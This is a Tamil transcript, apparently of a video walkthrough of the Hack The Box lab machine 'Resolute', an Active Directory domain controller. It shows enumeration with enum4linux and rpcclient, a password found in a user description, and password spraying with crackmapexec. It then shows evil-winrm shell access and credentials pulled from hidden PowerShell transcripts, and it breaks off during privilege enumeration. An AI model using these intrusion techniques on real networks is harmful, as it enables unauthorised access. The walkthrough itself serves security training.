ஹாய் கைஸ், இன்றைக்கி வந்து ஹேக் த பாக்ஸில் வந்து ரெசல்யூட் மிஷினுடைய வாக்த்ரூ வந்து பார்க்கலாம். ஸோ ஆக்டிவ் மிஷன்ஸில் 20 மிஷன்ஸில் இருக்கிற கடைசி, அதாவது நான் சால்வ் பண்ண கடைசி மிஷன் வந்து ரெசல்யூட். ஆக்சுவலாக இந்த மிஷன் வந்து ஒரு மீடியம் மிஷின். ஸோ ரேட்டிங்ஸ் பார்த்தீங்கன்னா யூஸர் வந்து கொஞ்சம் ஈஸியாக இருக்குது. அண்ட் ரூட் டிஃபிகல்ட்டி கூட அவ்வளோ ஒன்றும் இல்லை, ஏன்னா ஒரு காமன் எக்ஸ்ப்ளாய்ட் இருக்குதுக்கு. ஸோ அதை வச்சு நான் வந்து ரூட் பர்மிஷன்ஸ் வந்து எடுக்கிறோம். ஸோ இங்கே பார்த்தீங்கன்னா சிவி வந்து அதிகமாக இருக்குது, எனுமரேஷனும் நல்லா பண்ணியிருக்கணும், ரியல் லைஃப் மிஷினாகவும் இருக்குது. ஸோ ஆக்சுவலாக இந்த மிஷின் வந்து நான் எப்படி சால்வ் பண்ணேன்னா, எனுமரேஷன் பண்ணும்போது, அதாவது enum4linux அந்த டூலை வச்சு எனும் பண்ணும்போது ஒரு யூசர் கூடிய டிஸ்கிரிப்ஷன் இருக்கும். அந்த டிஸ்கிரிப்ஷனில் வந்து பாஸ்வேர்டு இருக்கும். ஸோ அந்த பாஸ்வேர்டு வச்சு நான் வந்து ஏவில் வின்னாரம், அதாவது WSMan சர்வீஸ் வந்து ரன்னிங்கில் இருக்குது. ஸோ அந்த சர்வீஸ்க்கு யூசர் நேம் பாஸ்வேர்டு வந்து கொடுத்து லாகின் பண்ணுறோம், அதாவது லோவர் ப்ரிவிலேஜ் ஷெல் எடுக்கிறோம். ஸோ அங்கேருந்து ஒரு பவர்ஷெல் ஸ்கிரிப்டில் இன்னொரு யூசருடைய பாஸ்வேர்டு இருக்கும். ஸோ இது வந்து ஒரு ஹாரிசான்டல் ப்ரிவிலேஜ் எஸ்கலேஷன். ஸோ அந்த யூசருக்கு மறுபடியும் நாம் யூசர் நேம் பாஸ்வேர்டு வச்சு லாகின் பண்ண பிறகு அந்த யூசருடைய ப்ரிவிலேஜஸ் பார்த்தோன்னா டிஎன்எஸ் அட்மின் குரூப் சேர்ந்தப்பட்ட யூசர் அவன். ஸோ டிஎன்எஸ் அட்மின் சேர்ந்த யூசர் பெர்மிஷன்ஸ், அதாவது உங்களுக்கு ஆக்சஸ் இருந்துச்சுன்னா அந்த பர்டிகுலர் யூசருக்கு நீங்கள் வந்து அந்த டொமைன் கண்ட்ரோலர், அந்த டிசியை வந்து நீங்கள் வந்து டேக் ஓவர் பண்ணலாம். ஸோ அதை பற்றி தான் இப்போ நம்ம பார்க்க போகிறோம். ஸோ லெட்ஸ் ஸ்டார்ட் 10.10.10.169. ஸோ யூஸ்வலாக நாம் வந்து எல்லா போர்ட்ஸ்க்கும் ஒரு அக்ரெசிவ் ஸ்கேனை வந்து ரன் பண்ணுவோம் 10.10.10.169. ஸோ இதை நான் ஏற்கனவே ரன் பண்ணி nmap full அப்படிங்கிற ஃபைலுக்கு நான் சேவ் பண்ணியிருக்கேன். ஸோ cat nmap full. இங்கே பார்த்தீங்கன்னா ஏகப்பட்ட சர்வீசஸ் ஓப்பன் அண்ட் ஃபில்டர்ட் ஸ்டேட்டில் இருக்குது. ஸோ யூஸ்வலாக நீங்கள் வந்து ஒரு பர்டிகுலர் மிஷினை வந்து டொமைன் கண்ட்ரோலர், அதாவது விண்டோஸ் டிசி ஒரு ஆக்டிவ் டைரக்டரி சம்மந்தப்பட்ட மிஷினை தெரிஞ்சுக்கிறதுக்கு இந்த சர்வீசஸ் பார்த்தாலும் உங்களுக்கே தெரிஞ்சுக்கணும். இதுக்கு பார்த்தீங்கன்னா டொமைன் இருக்குது, அதாவது டிஎன்எஸ் ரன்னிங்கில் இருக்குது, கர்பரோஸ் ரன்னிங்கில் இருக்குது, எல்டாப் இருக்குது. ஸோ இதை வச்சு நீங்கள் வந்து ஒரு முடிவுக்கு வரலாம், ஓகே இது வந்து ஒரு ஆக்டிவ் டைரக்டரி என்விரான்மெண்ட். இது என்ன, இது அவுட்புட் கொஞ்சம் வித்தியாசமாக இருக்கேன். ஓகே, இங்கே நான் வந்து அக்ரெசிவ் ஸ்கேன் கொடுத்து ரன் பண்ணல, அதாவது நான் சால்வ் பண்ணப்போ. ஸோ ஜஸ்ட் நான் ஓப்பன் போர்ட்ஸ் மட்டும் தான் ஸ்கேன் பண்ணியிருக்கேன். ஓகே, நோ ப்ராப்ளம், அப்படியே ப்ரொசீட் பண்ணலாம். அக்ரெசிவ் ஸ்கேன் ரன் பண்ண கொஞ்சம் டைம் ஆகும். ஸோ இங்கே பார்த்தீங்கன்னா n நம்பர் ஆஃப் சர்வீசஸ் இருக்குது, போர்ட் 445 இருக்குது, டொமைன் இருக்குது, கர்பரோஸ் இருக்குது, எல்டாப் இருக்குது. நிறைய எனுமரேஷன் டூல்ஸ் வந்து ரன் பண்ணலாம். ஸ்டார்டிங் ஃப்ரம் டிஎன்எஸில் இருந்து எல்டாப் இருக்குது, எல்டாப் query ரன் பண்ணலாம், எஸ்எம்பி கிளைண்ட் ரன் பண்ணலாம், எஸ்எம்பி எனுமரேஷன் பண்ணுறதுக்கு. ஸோ முக்கியமான இன்னொரு சர்வீஸ் வந்து WSMan சர்வீஸ், இதை பற்றி ஏற்கனவே சொல்லியிருக்கேன். ஸோ இதை வச்சு நாம் வந்து ஒரு ரிமோட் பவர்ஷெல் செஷன் வந்து எடுக்கலாம். ஸோ ஒன் பை ஒன்னாக நீங்கள் வந்து ஒரு டூலாக நீங்கள் வந்து ட்ரை பண்ணுறதுக்கு இன்ஸ்டட் வி கேன் யூஸ் enum4linux. ஸோ -a ஆப்ஷன் வந்து ஆல், நம்ம வந்து எல்லாமே எனுமரேட் பண்ண போகிறோம். ஸோ 10.10.10.169. ஸோ இப்படி கொடுத்தோன்னா, ஸோ நான் வந்து ஃபஸ்ட்டு இதை வெர்போஸாக பிரிண்ட் பண்ணுறேன். ஸோ வெர்போஸ் ஆப்ஷன் கொடுத்தீங்கன்னா என்னென்ன கமாண்ட்ஸை வச்சு இந்த பர்டிகுலர் எனுமரேஷன் வந்து ரன் இருக்குன்னு நம்மளுக்கு கமாண்டோடைய அவுட்புட் வந்து நம்மளுக்கு தெரியும். ஸோ இங்கே பார்த்தீங்கன்னா enum4linux வந்து ஆக்சுவலாக இந்த 6 கமாண்ட்ஸ் வச்சு தான் ரன் பண்ண போகுது. nmb lookup, net, rpc client, smb client, ldap search. ஸோ நம்ம வந்து ஒன் பை ஒன்னாக எல்லா கமாண்ட்ஸும் ரன் பண்ணுறதுக்கு பதில் அட் டைமில் அந்த பர்டிகுலர் டூலை ரன் பண்ணிங்கன்னா அந்தந்த பர்டிகுலர் கமாண்டோடைய அவுட்புட்ஸ் எல்லாமே நம்மளுக்கு வந்து ஒரு கன்சாலிடேட்டட் அவுட்புட் வந்து நம்மளுக்கு வந்து கிடைக்கும். ஸோ அதோடைய அவுட்புட் வந்து பார்க்கலாம். ஸோ ஃபஸ்ட்டில் இருந்து பார்க்கலாம். ஸோ பை டிஃபால்ட்டாக இது வந்து யூசர் நேம் பாஸ்வேர்டு வந்து நம்மளுக்கு ஆர்குமெண்ட்ஸ் ஒன்றும் பாஸ் பண்ணல. ஸோ பை டிஃபால்ட்டாக இது வந்து எம்டி யூசர் நேம் பாஸ்வேர்டு வந்து வச்சுக்கிட்டு நோன் யூசர் நேம்ஸ்க்கு வந்து ட்ரை பண்ணோம். ஸோ நெக்ஸ்ட் வந்து ஒர்க் குரூப்போடைய இன்ஃபர்மேஷன் வந்து என்னென்னு கலெக்ட் பண்ணுறதுக்கு NMB லுக்கப் வச்சு பார்ப்போம். ஸோ எந்த ஒரு ஒர்க் குரூப்ஸ் அவுட்புட்டும் நம்மளுக்கு வரல, NBT ஸ்டாட் கூட ஒன்றும் வரல. செஷன் செக்கில் பார்த்தீங்கன்னா நான் ஏற்கனவே சொல்லியிருக்கேன், SMB கிளைண்ட்டை வச்சு நம்ம வந்து ஒரு நல் செஷனை வந்து செக் பண்ணலாம். ஸோ இங்கே பார்த்தீங்கன்னா ஒர்க் குரூப் ஆப்ஷனுக்கு எந்த ஒரு ஒர்க் குரூப்பும் வரல, அதாவது NMB லுக்கப்பில் நம்மளுக்கு எந்த ஒரு ஒர்க் குரூப் ஆர் டொமைன் இன்ஃபர்மேஷன் வரல. ஸோ இங்கே வந்து W ஆப்ஷனில் காலியாக இருக்குது. ஸோ அந்த பர்டிகுலர் ஐபிக்கு டிஃபால்ட் ஐபிசி ஷேருக்கு நம்ம வந்து யூசர் நேம் வந்து
null and password வந்து null, அதாவது யூசர் நேம் அண்ட் பாஸ்வேர்டு ஒன்றா நீங்கள் சென்ட் பண்ணோன்னா மாடுலஸ் யூஸ் பண்ணணும். அண்ட் இஃப் யூசர் நேம் அண்ட் பாஸ்வேர்டு வந்து நல்லா அந்த பர்டிகுலர் ரிமோட் சிஸ்டம் வந்து அக்செப்ட் பண்ணுச்சுன்னா நம்ம வந்து இந்த பர்டிகுலர் கமாண்ட் வந்து ரன் பண்ணுறோம். -c ஆப்ஷன் வச்சு ஹெல்ப் கமாண்ட் வந்து ரன் பண்ணுறோம். சப்போஸ் இந்த பர்டிகுலர் கமாண்ட் வந்து ட்ரூ ரிசல்ட், அதாவது இங்கே பார்த்தீங்கன்னா ரீடைரக்ட் பண்ணுறோம் எந்த ஒரு std அவுட் அண்ட் எரரை. ஸோ இது வந்து எந்த ஒரு எரரும் கொடுக்கலன்னா ஓகே நல் செஷன் வந்து அலோவ் பண்ணுது. ஸோ அதை வச்சு தான் இது வந்து அவுட்புட்டாக நம்மளுக்கு வந்து கொடுக்குது. ஸோ நெக்ஸ்ட் வந்து டொமைன் எஸ்ஐடிஸை வந்து எனிமரேட் பண்ணுவோம் ஒன் பை ஒன்னாக ஆர்பிசி கிளைண்ட்டை வச்சு. ஸோ இங்கே பார்த்தீங்கன்னா ஒர்க் குரூப் அண்ட் யூசர் நேம் பாஸ்வேர்டு வந்து நல், எந்த ஒரு யூசர் நேம் பாஸ்வேர்டும் இல்லை. ஸோ இருந்தாலும் நம்ம வந்து ஒரு பர்டிகுலர் கொயரியை வந்து ரன் பண்ண முடியாது. ஸோ இதனால் என்ன தெரிய வருதுன்னா நம்ம ஆர்பிசி கிளைண்ட்டை வச்சு நிறைய எனிமரேஷன் டூல்ஸ் பண்ணலாம். ஆக்சுவலாக enum4linux வந்து ஹியூஜ் ஆர்பிசி கிளைண்ட் மேலே தான் டிபெண்ட் பண்ணோம். ஸோ இங்கே பார்த்தீங்கன்னா சர்வர் இன்ஃபோ அண்ட் ஒன் ஆஃப் தி இம்பார்ட்டண்ட் கமாண்ட் வந்து query disp info ஒன்று இருக்குது. ஸோ இந்த query disp info வந்து ரிமோட் சிஸ்டமில் எந்தெந்த யூசர் அக்கௌண்ட்ஸ் இருக்குது, ஸோ அவங்களுடைய ஆர்ஐடி இன்ஃபர்மேஷன் அண்ட் நேம் அண்ட் டிஸ்கிரிப்ஷன், அதாவது யூசர் அக்கௌண்ட் க்ரியேட் பண்ணும்போது ஒரு டிஸ்கிரிப்ஷன் செட் பண்ணுவோம். ஸோ அந்த டிஸ்கிரிப்ஷன் வந்து இங்கே வந்து பிரிண்ட்டாக இருக்குது. ஸோ நான் வந்து இனிஷியலாக இந்த மிஷினை சால்வ் பண்ணும்போது இந்த டிஸ்கிரிப்ஷன்ஸ் எல்லாம் நான் வந்து சரியாக நோட் டவுன் பண்ணல. ரொம்ப நேரமாக கழிச்சு தலையை பிச்சுக்கிட்டு அப்புறமா பார்க்கும்போது தான் இந்த பர்டிகுலர் டிஸ்கிரிப்ஷனில் வந்து பாஸ்வேர்டு இருக்குது. ஸோ இங்கே பார்த்தீங்கன்னா மார்க்கோ நோவேக் அப்படிங்கிற யூசர் நேமுக்கு, அதாவது மார்க்கோ அக்கௌண்ட்டுக்கு டிஸ்கிரிப்ஷனில் வந்து பாஸ்வேர்ட் கொடுத்துருக்கான். அக்கௌண்ட் கிரியேட்டட் பாஸ்வேர்ட் செட் டு வெல்கம் 123. அது மட்டும் இல்லாமல் எக்கச்சக்கமான யூசர் நேம்ஸ் வந்து நம்மளுக்கு வந்து அவுட்புட்டாக வந்திருக்கு. ஸோ இதை வந்து நாம் வந்து கலெக்ட் பண்ணிக்கலாம். ஸோ இதை நான் காப்பி பேஸ்ட் பண்ணிக்கிறேன். ஸோ காப்பி. ஸோ இதை வந்து நான் குவிட் பண்ணுறேன். ஸோ இன்ஸ்டெட் ஆஃப் நீங்கள் வந்து இந்த பர்டிகுலர் enum4linux ரன் பண்ணுறதுக்கு பதில் நீங்கள் டைரெக்டாக ஆர்பிசி கிளைண்ட் டூல் வந்து ரன் பண்ணலாம். ஸோ ஆஸ் யூஷுவல் நாம் வந்து யூசர் செஷன் வந்து நல் கொடுக்குறோம், அதாவது எந்த ஒரு யூசர் நேம் இல்லாமல் 10.10.169. ஸோ இங்கே பார்த்தீங்கன்னா அந்த பர்டிகுலர் ஒர்க் குரூப்போடைய யூசர் நேம் எதுவுமே இங்கே இல்லை. ஸோ இங்கே பார்த்தீங்கன்னா ஆர்பிசி கிளைண்ட். ஸோ நான் உங்களுக்கு சஜஸ்ட் பண்ணுறது என்னென்னா ஆர்பிசி கிளைண்ட்டோடைய ஹெல்ப் கமெண்ட்ஸ் எல்லாமே எக்ஸ்ப்ளோர் பண்ணுங்கள். எனுமரேஷனில் பார்த்தீங்கன்னா நிறைய எனுமரேஷன் கமெண்ட்ஸ் இருக்கும். ஸோ இதை வச்சு நிறைய டீட்டெயில்ஸ் வந்து நீங்கள் வந்து கலெக்ட் பண்ணலாம். ஸோ நாம் வந்து query பண்ண போகிறது வந்து query disp info. query disp info. ஸோ இங்கே பார்த்தீங்கன்னா சேம் அவுட்புட் ஜஸ்ட் லைக் enum4linuxல என்ன அவுட்புட் வந்திருக்கோ அதே அவுட்புட் தான் இங்கேயும் வந்திருக்கு. ஸோ அதனால தான் நான் வந்து சொல்கிறேன் ஒன் பை ஒன் இது வந்து எக்ஸ்டர்னல் டூல்ஸ் மேலே தான் டிபெண்டடாக இருக்குது. ஸோ இதை நான் குவிட் பண்ணிக்கிறேன். ஸோ நீங்கள் வந்து அந்த பர்டிகுலர் டூலை எக்ஸ்ப்ளோர் பண்ணுங்கள். ஸோ நான் வந்து காப்பி பண்ண யூசர்ஸ் வந்து users.txt அப்படிங்கிற ஃபைலுக்கு சேவ் பண்ணுறேன். ஸோ இப்போ நம்மக்கிட்ட வந்து அந்த பர்டிகுலர் மார்க்கோ அப்படிங்கிற யூசருக்கு பாஸ்வேர்டு வந்து வெல்கம் 123ன்னு தெரிஞ்சு போச்சு. அதை நான் நோட் பண்ண மறந்துட்டேன். ஸோ யூசர் நேம் வந்து மார்க்கோ அண்ட் பாஸ்வேர்டு வெல்கம் 123. ஓகே, இதை நான் சேவ் பண்ணி வச்சுக்கிறேன். cat threads.txt. threads.txt மார்க்கோ அண்ட் பாஸ்வேர்டு வந்து வெல்கம் 123 நாட். ஓகே, ஸோ ஏற்கனவே எனுமரேஷனில் வந்து நாம் பார்த்தோம் WSMan சர்வீஸ் வந்து ரன்னிங்கில் இருக்குது. ஸோ நாம் வந்து ஈவில் வின்னாரம் வந்து யூஸ் பண்ணலாம். ஸோ ஈவில் வின்னாரம். ஸோ ஈவில் வின்னாரம்க்கு IP-i ஆப்ஷன் நினைக்கிறேன் 10.10.10.169 அண்ட் யூசர் நேம் வந்து மார்க்கோ அண்ட் பாஸ்வேர்டு வந்து வெல்கம் 123 நாட். ஸோ நாட் வந்து ஒரு மெட்டா கேரக்டர். ஸோ அதை நீங்கள் எஸ்கேப் பண்ணணும். ஸோ யூசர் நேம் வந்து கரெக்டாக இருந்துச்சுன்னா, யூசர் நேம் அண்ட் பாஸ்வேர்ட் காம்பினேஷன் கரெக்டாக இருந்துச்சுன்னா நம்மளுக்கு வந்து ரிமோட் ஷெல் வந்து நம்மளுக்கு கிடைக்கும். பவர் ஷெல் செஷன் பார்த்தீங்கன்னா எரர் வந்திருக்கு, ஆத்தரைசேஷன் எரர் வந்திருக்கு. அதாவது இந்த பர்டிகுலர் யூசர் நேம் அண்ட் பாஸ்வேர்டு வந்து தப்பாக இருக்குது. ஸோ நீங்கள் வந்து ஈவில் வின்னாரம் வச்சு தான் தெரிஞ்சுக்கணுன்ட்டு அவசியம் இல்லை. நீங்கள் வந்து எஸ்எம்பி மேப் வச்சு ஒரு நார்மல் எஸ்எம்பி மேப் இல்லைனா எஸ்எம்பி கிளைண்ட்டை வச்சு நீங்கள் வந்து ஒரு பர்டிகுலர் யூசர் நேம் பாஸ்வேர்ட் கரெக்டாக இருக்கான்னு தெரிஞ்சுக்கலாம். ஸோ நார்மலாக நம்ம வந்து எஸ்எம்பி மேப்பில் -h யூஸ் பண்ணுவோம். ஸோ ரிமோட் ஷேர்ஸை வந்து செக் பண்ணுறதுக்கு.
ஸோ இது கூட நம்ம வந்து யூசர் நேம் பாஸ்வேர்டு வந்து பாஸ் பண்ணுவோம். ஃபார் எக்ஸாம்பிள் இங்கே பார்த்தீங்கன்னா ஆக்சஸ் டினைடுன்னு இருக்குது. ஸோ இன்ஸ்டெட் ஆஃப் தட் நீங்கள் வந்து அந்த பர்டிகுலர் யூசர் நேம் மார்க்கோ அண்ட் -p வெல்கம் 123 நாட் லோவர் யூ. எஸ்எம்பி கிளைண்ட்டுக்கும் மேப்புக்கும் கன்ஃபியூஸ் ஆகிடும் அடிக்கடி. ஸோ லோவர் கேஸ் யூ அண்ட் பி. ஸோ சப்போஸ் தப்பாக இருக்கிறதுனால அத்தன்டிகேஷன் எரர் வரும். ஸோ இப்படி தான் நீங்கள் வந்து ஒரு யூசர் நேம் பாஸ்வேர்ட் கரெக்டாக இருக்கான்னு தெரிய வருது. ஸோ நோ வரிஸ், நம்மக்கிட்ட ஆல்ரெடி ஒரு லிஸ்ட் ஆஃப் யூசர்ஸ் இருக்குது. மேபி அந்த பர்டிகுலர் பாஸ்வேர்டு வந்து ஏதாச்சும் ஒரு பர்டிகுலர் யூசருக்கு மேட்ச் ஆக வாய்ப்பு இருக்குது. ஸோ அது எல்லாமே நம்ம வந்து ப்ரூட் ஃபோர்ஸ் பண்ண போகிறோம். ப்ரூட் ஃபோர்ஸ் பண்ணுறதுக்கு நிறைய டூல்ஸ் இருக்குது. எஸ்எம்பி ப்ரூட் ஃபோர்ஸ் பண்ணுறதுக்கு ஹைட்ரா இருக்குது, crackmapexec இருக்குது, மெடஸ்ப்ளாய்ட் கூட இருக்குது. ஸோ நான் வந்து crackmap யூஸ் பண்ணுறேன். ஸோ இதை வந்து ஒரு பாஸ்வேர்ட் லிஸ்ட்டாக சேஞ்ச் பண்ணுறேன் நான். ஸோ இதுக்கு நான் வந்து இதை நான் கிரெப் பண்ணி கட் பண்ணி ஜஸ்ட் லைக் எப்படி லினக்ஸ் ஃபில்டர் சொல்லியிருக்கேனோ அதை வச்சு நான் வந்து பண்ணலாம். பட் எனக்கு விம்மில் பண்ணுறதுக்கு ரொம்பவே பிடிக்கும். ஸோ மாடலஸ் சப்ஸ்டிடியூட் நான் வந்து ஸ்டார்டிங்கில் இருக்கிற இந்த போர்ஷனை வந்து எடுக்கணும், அதாவது இந்த போர்ஷன். ஸோ அதை நாம் வந்து எடுக்கலாம். ஸோ யூசர் இது வந்து ஒரு மெட்டா கேரக்டர். ஸோ நாம் எஸ்கேப் பண்ணணும். ஸோ ஜிசி டைப் பண்ணுறேன். ஜிசின்னா குளோபலை நான் வந்து ரீப்ளேஸ் பண்ணணும். அண்ட் சி ஃபார் கன்ஃபர்ம், அதாவது ஆட்டோமேட்டிக்காக 1 by 1க்கு என்கிட்ட ப்ராம்ப்ட் வந்து கேட்கக்கூடாது அதனால். ஸோ ரீப்ளேஸ் ஒய்என்ஏ, ஏன்னா ஆல். ஸோ எல்லாமே நான் வந்து ரீப்ளேஸ் பண்ணேன். பார்த்தீங்கன்னா 27 சப்ஸ்டியூஷன்ஸ் ஆக்சுவலி ரீப்ளேஸ் ஆகிடுச்சு. ஸோ அதே மாதிரி நான் வந்து நெக்ஸ்ட்டு காம்பினேஷன், அதாவது பாஸ்வேர்டு அனுப்பியிருக்கு, அதாவது இந்த செக்ஷன். ஸோ இதுக்கு நான் வந்து சேம் அந்த பர்டிகுலர் க்ளோசிங் பிரேசஸ், அதுக்கப்புறமா வர எல்லா கேரக்டர்ஸ் அண்ட் ஐ எம் ரீப்ளேசிங் வித் நத்திங். ஸோ இங்கே பார்த்தீங்கன்னா செகண்ட் செக்ஷன். ஸோ இதை பற்றி நான் வந்து செட் கமெண்ட்டில் வந்து டீட்டெயிலாக எக்ஸ்பிளைன் பண்ணுறேன். ஏன்னா மோஸ்ட் ஆஃப் தி விம் கமெண்ட்ஸ் அண்ட் செட் வந்து கொஞ்சம் சிமிலராக தான் இருக்கும். ஸோ ஆல். ஸோ இப்போ பார்த்தீங்கன்னா நம்மக்கிட்ட ஒரு நல்ல யூசர் லிஸ்ட் இருக்குது. ஸோ cat users.txt. ஓகே. ஸோ crackmap இது ஒரு நல்ல டங் ட்விஸ்டராக இருக்குது. ஸோ crackmapexec சிஎம்இ ஷார்ட்டாக நீங்கள் வந்து நான் சிஎம்இன்னு கூப்பிட்றேன். ஸோ நிறைய ப்ரோட்டோகால்ஸ் வந்து நீங்கள் வந்து ரன் பண்ணலாம் சிஎம்ஏ வச்சு. எஸ்எம்பி, HTB, FTP எல்லாம் ரன் பண்ணலாம். ஸோ அந்த பர்டிகுலர் ப்ரோட்டோகால் வந்து நீங்கள் வந்து ஸ்பெசிஃபை பண்ணணும். ஸோ நெக்ஸ்ட் வந்து டார்கெட் 10.10.10 169 வந்து டார்கெட். அண்ட் நான் வந்து யூசர் லிஸ்ட்டை வந்து பாஸ் பண்ணுறேன். ஸோ நீங்கள் வந்து இங்கே யூசர் ஒரு ஸ்பெசிஃபிக் யூசர் நேம் கூட கொடுக்கலாம். நான் வந்து லிஸ்ட்டு பாஸ் பண்ணுறேன். ஸோ நீங்கள் வந்து பாஸ்வேர்ட்ஸ் லிஸ்ட் கூட கொடுக்கலாம், இல்லைனா ஒரு கஸ்டம் பாஸ்வேர்ட் கூட கொடுக்கலாம். அது ஆட்டோமேட்டிக்காக டிடெக்ட் பண்ணோம் எதர் இந்த பர்டிகுலர் ஸ்ட்ரிங் வந்து ஃபைல் நேமோ இல்லை மேபி ஆக்சுவல் பாஸ்வேர்ட், அது ஆட்டோமேட்டிக்காக எடுத்துக்கும். ஸோ நோ வரிஸ். ஸோ சிஎம்இ வந்து ரன்னிங்கில் இருக்குது. அவுட்புட் வந்து நம்மளுக்கு இப்போ தெரியும். ஸோ இங்கே பார்த்தீங்கன்னா 1 by 1 ட்ரை அவுட் பண்ணுது. ஸோ விண்டோஸ் சர்வர் 2016 64 பிட் அண்ட் மிஷினுடைய நேம் வந்து ரெசல்யூட் அண்ட் டொமைன் பார்த்தீங்கன்னா மெகா பேங்க். இந்த டொமைன் நேம் ஆக்சுவலாக அக்ரெசிவாக நான் வந்து nmap ஸ்கிரிப்ட் வந்து ரன் பண்ணியிருந்தேன்னா டீட்டெயில்ஸ் ஆல்ரெடி தெரிஞ்சிருக்கோம். ஸோ நோ ப்ராப்ளம். ஸோ இங்கே பார்த்தீங்கன்னா அந்த பர்டிகுலர் ஒர்க் குரூப்போடைய யூசர் நேம் அண்ட் பாஸ்வேர்டு வந்து எல்லா அக்கௌண்ட்ஸ்க்கும் ட்ரை பண்ணிகிட்டே இருக்கேன் 1 by 1. ஸோ இங்கே பார்த்தீங்கன்னா ஒன்று சக்ஸஸில் இருக்குது இந்த க்ரீன் ப்ளஸ் மார்க்கில். அது வந்து மெலானி. ஸோ மெலானியோடைய அக்கௌண்ட்டுக்கு தான் அந்த பர்டிகுலர் பாஸ்வேர்டு வந்து மேட்ச் ஆகுது. ஸோ நாம் வந்து ஈவில் வின்னாரம் வந்து அந்த பர்டிகுலர் யூசருக்கு வந்து யூஸ் பண்ணலாம். ஸோ ஈவில் வின்னாரம் -i 10.10.10.169 அண்ட் யூசர் வந்து மெலானி அண்ட் பாஸ்வேர்ட் வெல்கம் 123 நாட். இப்போ வந்து எஸ்கேப் பண்ணலாம். ஸோ சப்போஸ் ஆக்சுவலாக இது கரெக்ட் யூசர் நேம் பாஸ்வேர்ட் தான். ஸோ நம்மளுக்கு பவர்ஷெல் செஷன் வந்து கிடச்சிருக்கு. ஸோ இப்படி தான் நாம் வந்து ஒரு லோ ப்ரிவிலேஜ் ஆக்சஸ் ஷெல் வந்து எடுக்கிறோம். ஸோ நான் வந்து இன்னொரு டெர்மினல் ஓப்பன் பண்ணிக்கிறேன். ஸோ இனிஷியலாக நான் வந்து எப்போவுமே நான் உங்களுக்கு ஏற்கனவே சொல்லியிருக்கேன், ஒரு யூசர் பெர்மிஷன்ஸ் வந்து அடைஞ்ச உடனே ஃபஸ்ட் அந்த ஃபைல் சிஸ்டமில் என்னென்ன ஃபைல்ஸ் இருக்குது, என்னென்ன ஏதாச்சும் இன்ட்ரெஸ்டிங்கான டைரக்டரிஸ் இருக்கா, ஃபைல்ஸ் இருக்கலான்னு தெரிஞ்சுக்கணும். ஸோ அந்த மாதிரி பார்க்கும்போது நான் வந்து
ரூட் சிஸ்டம், அதாவது சி டைரக்டரியில் ஒரு இம்பார்ட்டண்ட்டான டைரக்டரி இருந்துச்சு. ஸோ நீங்கள் நார்மல் டிஐஆர் கமெண்ட் கொடுத்தீங்கன்னா அது வந்து தெரியாது. ஸோ நீங்கள் வந்து எப்போவுமே ஹிடன் டைரக்டரிஸ் வந்து தெரிஞ்சுக்கணும். ஸோ டிஐஆர் -a /a. ஷிட், இது வந்து பவர்ஷெல். ஸோ ஆக்சுவலாக அது சிஎம்டியோடைய சின்டாக்ஸ் அது. ஸோ டிஐஆர் -force யூஸ் பண்ணணும் பவர்ஷெல்லில். இல்லைன்னா நீங்கள் வந்து எல்எஸ் கமெண்ட் கூட யூஸ் பண்ணலாம், ls-force. ஸோ இங்கே பார்த்தீங்கன்னா நிறைய ஹிடன் ஃபைல்ஸ் எல்லாம் தெரிய வருது. உங்களுக்கே தெரியும், இந்த ரிசைக்கிள் பின் இருக்குது, ரிகவரி இருக்குது. ஸோ ஒன் ஆஃப் தி அன்யூஷுவல் டைரக்டரி வந்து பிஎஸ் டிரான்ஸ்கிரிப்ட்ஸ் அப்படிங்கிற ஒரு டைரக்டரி இருக்குது. ஸோ அது வந்து என்னென்னு பார்க்கலாம். ஸோ பிஎஸ் டிரான்ஸ்கிரிப்ட்ஸ். ஓகே, ஸோ இங்கேயும் ஹிடன் ஃபைல்ஸ் வந்து பார்க்கலாம். கோர்ஸ் ஸோ ஒரு டைரக்டரி இருக்குது 20191203. ஸோ இங்கே ஒரு ஃபைல் இருக்குது. ஸோ இது வந்து ஒரு டெக்ஸ்ட் ஃபைல். ஸோ இது வந்து டைப், அதாவது கேட் பண்ணி பார்க்கலாம். ஸோ இதை கேட் பண்ணி பார்க்கும்போது இது வந்து ஒரு சிம்பிள் பவர்ஷெல் ஸ்கிரிப்டோடைய அவுட்புட். ஸோ இதை வந்து இந்த பர்டிகுலர் ஃபைலில் வந்து சேவ் பண்ணி வச்சுருக்கான். ஸோ ஒன் பை ஒன்னாக பார்க்கும்போது நம்மளுக்கு வந்து இம்பார்ட்டண்ட்டான இன்ஃபர்மேஷன் வந்து இந்த லைன். ஸோ இந்த லைனில் பார்த்தீங்கன்னா சிஎம்டியை வச்சு அவன் வந்து நெட் யூஸ் ஒரு ரிமோட் சிஸ்டமோடைய ஃபைலில் வந்து அவன் வந்து ஷேரை வந்து ஆக்சஸ் பண்ணுறான். ஸோ அந்த ஷேரை ஆக்சஸ் பண்ணுறதுக்கு யூசர் நேம் பாஸ்வேர்டு வந்து யூஸ் பண்ணியிருக்கான். ஸோ யூசர் நேம் வந்து ரியான் அண்ட் பாஸ்வேர்டு வந்து சர்வர் அட்மின் இது. ஸோ இதை வந்து நாம் வந்து காப்பி பண்ணிக்கலாம். ஸோ கேட் ரேட்ஸ். ஓகே, ஸோ இந்த பர்டிகுலர் கரண்ட் செஷனை வந்து நான் எக்ஸிட் பண்ணுறேன். ஏன்னா நம்மக்கிட்ட இப்போது ரியான் உடைய க்ரெடென்ஷியல்ஸ் இருக்குது. ஸோ ஈவில் வின்னாரம்க்கு ரியானுடைய க்ரெடென்ஷியல்ஸை வந்து பாஸ் பண்ணலாம். ஸோ ரியான் இந்த பாஸ்வேர்ட். எஸ்கேப் பண்ணலாம். எஸ்கேப். ஸோ இப்போ பார்த்தீங்கன்னா நாம் வந்து ரியான் யூசருடைய பெர்மிஷனில் இருக்கும். சாரி, ரியான் அக்கௌண்ட் லாகின் இருக்கும். ஸோ சிடி ரூட்டுக்கு போகலாம். ஸோ இப்படி தான் ஒரு யூசர் ப்ரிவிலேஜை வந்து அட்டைன் பண்ணுறோம். ஸோ ஒரு நார்மல் எனுமரேஷனை வந்து ரன் பண்ணும்போது, நார்மல் வெரி பேசிக் எனுமரேஷன், அதாவது லினக்ஸில் எப்படி நாம் எந்தெந்த யூசர் இருக்காங்க, ஸோ அந்த யூசர்ஸோடைய ஏதாச்சும் சூடோ பெர்மிஷன்ஸ் இருக்கான்னு தெரிஞ்சுக்கிறோம். ஸோ அதே மாதிரி நம்ம வந்து ரியானுடைய ப்ரிவிலேஜஸை வந்து தெரிஞ்சுக்கிறதுக்கு ஹூ 